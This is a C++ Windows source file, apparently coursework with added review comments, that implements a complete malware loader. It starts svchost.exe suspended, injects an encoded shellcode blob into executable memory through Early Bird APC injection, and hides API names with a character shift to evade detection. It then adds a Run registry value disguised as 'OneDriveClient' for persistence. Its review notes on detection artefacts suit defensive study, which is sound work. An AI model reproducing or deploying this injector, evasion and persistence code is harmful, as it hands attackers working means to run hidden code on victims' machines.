1#include "stdafx.h"
2#include <windows.h>
3#include <iostream>
4#include <tchar.h>
5#include <psapi.h>
6#include <tchar.h>
7#include <clocale>
8#include <shlobj.h>
9#include <string>
10
11using namespace std;
12
// Payload that main() copies into the child process and runs there via an APC.
// According to the author's comment it only pops a message box reading
// "Hi INFO0045" (a course identifier), i.e. it is a demonstration payload.
// The byte layout — a short stub followed by long runs of printable
// 0x30-0x39 / 0x41-0x5a bytes — looks like an alphanumeric-encoded x86 stub.
// NOTE(review): presumably an msfvenom-style encoded blob; what it really does
// cannot be verified from this listing — confirm by emulation before trusting
// the comment above.
// Because the initializer is a string literal, sizeof(shellcode) includes the
// trailing NUL; main() allocates and writes that full size.
unsigned char shellcode[] =
"\x89\xe5\xd9\xc6\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x6d\x38\x4e\x62\x35\x50\x77\x70\x55\x50\x43\x50\x6d"
"\x59\x4b\x55\x54\x71\x49\x50\x43\x54\x6c\x4b\x32\x70\x30\x30"
"\x6c\x4b\x36\x32\x36\x6c\x4c\x4b\x31\x42\x34\x54\x6e\x6b\x33"
"\x42\x57\x58\x66\x6f\x4f\x47\x63\x7a\x64\x66\x44\x71\x39\x6f"
"\x4c\x6c\x65\x6c\x75\x31\x73\x4c\x75\x52\x54\x6c\x71\x30\x49"
"\x51\x7a\x6f\x64\x4d\x57\x71\x4b\x77\x39\x72\x49\x62\x71\x42"
"\x62\x77\x4e\x6b\x36\x32\x44\x50\x6c\x4b\x61\x5a\x35\x6c\x6e"
"\x6b\x42\x6c\x67\x61\x51\x68\x68\x63\x63\x78\x36\x61\x4b\x61"
"\x46\x31\x6c\x4b\x50\x59\x77\x50\x75\x51\x4b\x63\x6e\x6b\x51"
"\x59\x65\x48\x38\x63\x34\x7a\x71\x59\x4c\x4b\x36\x54\x6c\x4b"
"\x43\x31\x69\x46\x46\x51\x79\x6f\x6e\x4c\x59\x51\x6a\x6f\x36"
"\x6d\x46\x61\x78\x47\x66\x58\x49\x70\x52\x55\x5a\x56\x53\x33"
"\x63\x4d\x7a\x58\x75\x6b\x43\x4d\x45\x74\x63\x45\x6b\x54\x32"
"\x78\x4e\x6b\x76\x38\x45\x74\x46\x61\x4b\x63\x75\x36\x6c\x4b"
"\x36\x6c\x52\x6b\x6c\x4b\x52\x78\x67\x6c\x76\x61\x59\x43\x4c"
"\x4b\x53\x34\x4e\x6b\x45\x51\x48\x50\x6b\x39\x42\x64\x44\x64"
"\x57\x54\x31\x4b\x43\x6b\x61\x71\x30\x59\x52\x7a\x72\x71\x79"
"\x6f\x4b\x50\x53\x6f\x33\x6f\x61\x4a\x6e\x6b\x34\x52\x38\x6b"
"\x6e\x6d\x53\x6d\x53\x5a\x57\x71\x6c\x4d\x6c\x45\x4c\x72\x63"
"\x30\x73\x30\x47\x70\x32\x70\x75\x38\x74\x71\x6e\x6b\x32\x4f"
"\x6e\x67\x69\x6f\x4b\x65\x6f\x4b\x7a\x50\x78\x35\x49\x32\x72"
"\x76\x72\x48\x6f\x56\x4e\x75\x6d\x6d\x4f\x6d\x39\x6f\x4a\x75"
"\x57\x4c\x56\x66\x71\x6c\x67\x7a\x6f\x70\x6b\x4b\x69\x70\x71"
"\x65\x43\x35\x4f\x4b\x43\x77\x55\x43\x72\x52\x30\x6f\x71\x7a"
"\x45\x50\x52\x73\x39\x6f\x7a\x75\x45\x33\x75\x31\x32\x4c\x52"
"\x43\x34\x6e\x65\x35\x62\x58\x62\x45\x45\x50\x41\x41";
46
// API names (plus a few constant/struct names nothing in this file looks up)
// with every character shifted up by 2; decryptor(2, ...) reverses the shift.
// Keeping them shifted keeps the literal names out of a plain `strings` dump
// of the binary. The table is indexed by position; main() uses only entries
// 11, 13, 16 and 17. NOTE(review): entry 0 is never used — LoadNtdllFunctions()
// passes the plain literal "NtQueueApcThread" to GetProcAddress, so the most
// telling name is in the binary in clear text regardless of this table.
string Apicalls[19] = { "PvSwgwgCreVjtgcf", // "NtQueueApcThread", 0 (unused here)
"VjtgcfJcpfng", // "ThreadHandle", 1
"CreTqwvkpg", // "ApcRoutine", 2
"CreTqwvkpgEqpvgzv", // "ApcRoutineContext", 3
"CreUvcvwuDnqem", // "ApcStatusBlock", 4
"CreTgugtxgf", // "ApcReserved", 5
"IgvOqfwngJcpfngC", // "GetModuleHandleA", 6
"IgvRtqeCfftguu", // "GetProcAddress", 7
"UVCTVWRKPHQ", // "STARTUPINFO", 8
"RTQEGUUaKPHQTOCVKQP", // "PROCESS_INFORMATION", 9 ('a' shifts down to '_')
"\\gtqOgoqt{", // "ZeroMemory", 10
"EtgcvgRtqeguuY", // "CreateProcessW" (the wide-char export, matching the L"" path in main), 11
"ETGCVGaUWURGPFGF", // "CREATE_SUSPENDED", 12
"XktvwcnCnnqeGz", // "VirtualAllocEx", 13
"OGOaEQOOKV", // "MEM_COMMIT", 14
"RCIGaGZGEWVGaTGCFYTKVG", // "PAGE_EXECUTE_READWRITE", 15
"YtkvgRtqeguuOgoqt{", // "WriteProcessMemory", 16
"TguwogVjtgcf", // "ResumeThread", 17
"EnqugJcpfng" }; // "CloseHandle", 18
66
// Function-pointer types for the kernel32 routines that main() resolves by
// name at run time (GT() + the shifted names in Apicalls) instead of importing:
//   aka  -> CreateProcessW (Apicalls[11]). The first parameter is spelled
//           LPCWSTR while the others use TCHAR-dependent LPTSTR/LPCTSTR, so
//           the prototype only matches in a UNICODE build — which the rest of
//           the file assumes too (main() casts a TCHAR[] to wstring).
//   aka2 -> VirtualAllocEx (Apicalls[13]).
//   aka4 -> WriteProcessMemory (Apicalls[16]). The real function's last
//           parameter is a SIZE_T* (bytes written); it is typed as a plain
//           SIZE_T here. main() passes NULL for it, which converts to 0, so
//           the mismatch is harmless in practice.
//   aka5 -> ResumeThread (Apicalls[17]). Declared as returning BOOL although
//           ResumeThread returns a DWORD (previous suspend count, (DWORD)-1 on
//           failure); both are 32-bit so main()'s `== -1` check still works.
// The globals Cp/Va/Wpm/Rth have static storage, so they are null until
// main() assigns them.
typedef BOOL(__stdcall *aka)(LPCWSTR, LPTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
aka Cp;
typedef LPVOID(WINAPI *aka2)(_In_ HANDLE, _In_opt_ LPVOID, _In_ SIZE_T, _In_ DWORD, _In_ DWORD);
aka2 Va;
typedef BOOL(__stdcall *aka4)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T);
aka4 Wpm;
typedef BOOL(WINAPI *aka5)(HANDLE); // ResumeThread prototype (see note above on the return type)
aka5 Rth;
// Undo the Caesar shift applied to the entries of Apicalls: every character
// up to the first NUL (and at most the first 100 characters) has `key`
// subtracted from it. The table is encoded with a shift of 2, so every caller
// in this file passes key = 2 (a key of 3 would yield garbage names).
// Works on a by-value copy and returns it; the caller's string is untouched.
std::string decryptor(int key, std::string str) {
 const std::size_t limit = str.size() < 100 ? str.size() : 100;
 for (std::size_t pos = 0; pos < limit; ++pos) {
  char &ch = str[pos];
  if (ch == '\0') {
   break; // embedded NUL terminates the decode, like the original loop
  }
  ch = static_cast<char>(ch - key);
 }
 return str;
}
83
// Pointer to the undocumented ntdll export NtQueueApcThread. It has static
// storage, so it is null until LoadNtdllFunctions() fills it in. Unlike the
// kernel32 routines this one is resolved with a clear-text name, not through
// the shifted Apicalls table. main() calls it with ApcRoutine = the remote
// buffer and the three APC arguments all zero.
NTSTATUS(NTAPI *NtQueueApcThread)
(_In_ HANDLE ThreadHandle, _In_ PVOID ApcRoutine,
 _In_ PVOID ApcRoutineContext OPTIONAL, _In_ PVOID ApcStatusBlock OPTIONAL,
 _In_ ULONG ApcReserved OPTIONAL);
89
// Resolve NtQueueApcThread out of ntdll into the global pointer above.
// Returns FALSE when ntdll cannot be found (GetModuleHandle, not LoadLibrary:
// ntdll is already mapped into every process) or when the export is missing.
// NOTE(review): there is no `return TRUE` after the last check, so on the
// success path this BOOL function falls off its end — undefined behaviour
// (MSVC reports it as warning C4715). main() compares the result with FALSE,
// so it is whatever happens to be in EAX at that point; presumably the
// non-null GetProcAddress result is still there, but that is luck, not a
// contract.
BOOL LoadNtdllFunctions() {
 HMODULE hNtdll = GetModuleHandleA("ntdll");
 if (hNtdll == NULL)
  return FALSE;

 // Clear-text export name; see the note on the Apicalls table.
 NtQueueApcThread =
  (NTSTATUS(NTAPI *)(HANDLE, PVOID, PVOID, PVOID, ULONG))GetProcAddress(
   hNtdll, "NtQueueApcThread");
 if (NtQueueApcThread == NULL)
  return FALSE;
}
// Resolve export NM from module LB, loading the module if it is not mapped
// yet. Returns the export's address, or 0 when the module cannot be loaded or
// the export does not exist (GetProcAddress's own NULL). The module handle is
// never released; the callers in this file pass kernel32, which is always
// mapped anyway. Callers are expected to check for 0 — main() does not.
FARPROC GT(LPCSTR LB, LPCSTR NM) {
 if (HMODULE mod = LoadLibraryA(LB)) {
  return GetProcAddress(mod, NM);
 }
 return 0;
}
109
// Entry point. What it does, in order (no privilege or platform checks
// anywhere; everything runs as the launching user):
//   1. resolve NtQueueApcThread from ntdll (LoadNtdllFunctions);
//   2. start C:\Windows\System32\svchost.exe with CREATE_SUSPENDED;
//   3. VirtualAllocEx an RWX region in it and WriteProcessMemory the
//      `shellcode` blob there;
//   4. NtQueueApcThread that region onto the still-suspended main thread and
//      ResumeThread it, so the APC (the payload) runs before svchost's own
//      entry point — the "Early Bird" APC injection pattern;
//   5. add an HKCU ...\Run value named "OneDriveClient" that points at
//      %APPDATA%\OneDriveClient.exe — a file this listing never creates.
// The kernel32 routines (CreateProcessW, VirtualAllocEx, WriteProcessMemory,
// ResumeThread) are resolved by name at run time through GT() with the shifted
// strings in Apicalls, so they do not show up in the import table.
// `void main()` is non-standard; MSVC accepts it, a conforming compiler wants int.
//
// NOTE(review): the observable artefacts for detection are exactly these
// calls — svchost.exe created suspended by a parent that is not services.exe,
// a cross-process RWX allocation followed by a write and a queued APC, and a
// new HKCU Run value whose target lives under %APPDATA%.
void main()
{
 // NOTE(review): LoadNtdllFunctions() has no `return TRUE` on its success
 // path, so this compares against an indeterminate value (see that function).
 if (LoadNtdllFunctions() == FALSE) {
  cout << "Failed to load NTDLL functions.\n" << endl;
  return;
 }

 STARTUPINFO si;
 PROCESS_INFORMATION pi;

 // CreateProcessW requires si.cb; everything else stays zeroed (no redirected
 // standard handles, default window settings).
 ZeroMemory(&si, sizeof(si));
 si.cb = sizeof(si);
 ZeroMemory(&pi, sizeof(pi));

 // Start the child (legitimate) process svchost.exe in a suspended state.
 // "Kernel32.dll" is 12 characters + NUL and exactly fills kr[13].
 char kr[13];
 string kernel = "Kernel32.dll";
 strcpy_s(kr, kernel.c_str());
 // Apicalls[11] decodes to "CreateProcessW". NOTE(review): GT() returns 0
 // when resolution fails and neither Cp nor Va/Wpm/Rth below is checked
 // before being called through — a failed lookup becomes a null call.
 Cp = (aka)GT(kr, (decryptor(2, Apicalls[11])).c_str());
 if (!Cp(L"C:\\Windows\\System32\\svchost.exe", // Hard-coded host process; the path is not validated
  NULL, // Command line
  NULL, // Process handle not inheritable
  NULL, // Thread handle not inheritable
  FALSE, // Set handle inheritance to FALSE
  CREATE_SUSPENDED, // Main thread starts suspended so the APC can be queued before it runs
  NULL, // Use parent's environment block
  NULL, // Use parent's starting directory
  &si, // Pointer to STARTUPINFO structure
  &pi) // Pointer to PROCESS_INFORMATION structure
  )
 {
  cout << "CreateProcess failed (" << GetLastError() << ")." << endl;
  return;
 }

 // Allocate sizeof(shellcode) bytes of RWX memory inside the child process.
 // NOTE(review): on this and the next failure path the suspended child is
 // neither resumed nor terminated and pi.hProcess/pi.hThread are never
 // closed; system("pause") also spawns a cmd.exe, a further observable.
 Va = (aka2)GT(kr, (decryptor(2, Apicalls[13])).c_str());
 LPVOID baseAddress = Va(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 if (baseAddress == NULL) {
  cout << "Cannot allocate in created process" << endl;
  system("pause");
  return ;
 }

 // Copy the shellcode into the allocated region (bytes-written pointer
 // omitted; the typedef declares that parameter as SIZE_T, see aka4).

 Wpm = (aka4)GT(kr, (decryptor(2, Apicalls[16])).c_str());
 if (!Wpm(pi.hProcess, baseAddress, shellcode, sizeof(shellcode), NULL)) {
  cout << "Cannot write into child process memory" << endl;
  system("pause");
  return ;
 }
 // Queue an Asynchronous Procedure Call (APC) onto the child's main thread
 // whose routine is the injected buffer itself; the three APC arguments are 0.
 // NOTE(review): NTSTATUS 0 is STATUS_SUCCESS; any non-zero status is treated
 // as failure, but the code only prints and then still resumes the thread, so
 // on APC failure a clean svchost.exe simply runs.
 if (NtQueueApcThread(pi.hThread, baseAddress, 0, 0, 0)) {
  cout << "Cannot queue APC to main thread" << endl;
 }

 // Resume the main thread:
 // ------------------------
 // The pending user-mode APC is delivered before the thread reaches the
 // executable's entry point, i.e. the payload runs first. ResumeThread
 // returns the previous suspend count (1 here) or (DWORD)-1 on failure.


 Rth = (aka5)GT(kr, (decryptor(2, Apicalls[17])).c_str());
 if (Rth(pi.hThread) == -1) {
  cout << "Cannot resume the main thread of the child process" << endl;
  return ;
 }

 // The PID of the created svchost.exe is printed at the end of main(); it can
 // be checked with `tasklist /fi "pid eq <pid>"` in a command prompt.

 // ---- Persistence: HKCU Run value ----

 // Build "<%APPDATA%>\OneDriveClient.exe " (note the trailing space in the
 // literal) in CurrentDirz.
 // NOTE(review): CurrentDirz is not initialised, so if SHGetFolderPath fails
 // the branch is skipped and _tcslen() below reads an indeterminate buffer.
 // The _tcscpy is unbounded; it only overflows MAX_PATH for an APPDATA path
 // longer than ~239 characters, which is unlikely but not checked.
 // The `(wstring)CurrentDirz` cast requires a UNICODE build (TCHAR == wchar_t).
 DWORD pathLen = 0;
 TCHAR CurrentDirz[MAX_PATH];


 if (SUCCEEDED(SHGetFolderPath(NULL,
  CSIDL_APPDATA,
  NULL,
  0,
  CurrentDirz))) {
  wstring LoaderRoaming = L"\\OneDriveClient.exe ";
  wstring FinalREG = (wstring)CurrentDirz + LoaderRoaming;

  _tcscpy(CurrentDirz, FinalREG.c_str());

 }
 pathLen = _tcslen(CurrentDirz);

 // Open the per-user Run key (no admin rights needed) and add the value.
 // NOTE(review): nothing in this file drops OneDriveClient.exe, so the entry
 // points at a file that presumably comes from elsewhere — confirm against the
 // rest of the sample. The value name mimics a legitimate OneDrive component.
 HKEY newValue;
 if (RegOpenKey(HKEY_CURRENT_USER,
  TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"),
  &newValue) != ERROR_SUCCESS)
 {
  return ;
 }
 // NOTE(review): pathLen excludes the terminating NUL; the RegSetValueEx
 // documentation asks for cbData of a REG_SZ to include it, i.e.
 // (pathLen + 1) * sizeof(TCHAR). Readers generally cope, but it is a
 // documented-contract violation.
 DWORD pathLenInBytes = pathLen * sizeof(*CurrentDirz);
 if (RegSetValueEx(newValue,
  TEXT("OneDriveClient"),
  0,
  REG_SZ,
  (LPBYTE)CurrentDirz,
  pathLenInBytes) != ERROR_SUCCESS)
 {
  RegCloseKey(newValue);
  return ;
 }
 RegCloseKey(newValue);

 cout << "Process id of svchost.exe is : " << pi.dwProcessId << endl;

 // Close process and thread handles (only on the fully successful path;
 // every early return above leaks them until this process exits).
 CloseHandle(pi.hProcess);
 CloseHandle(pi.hThread);
}
233}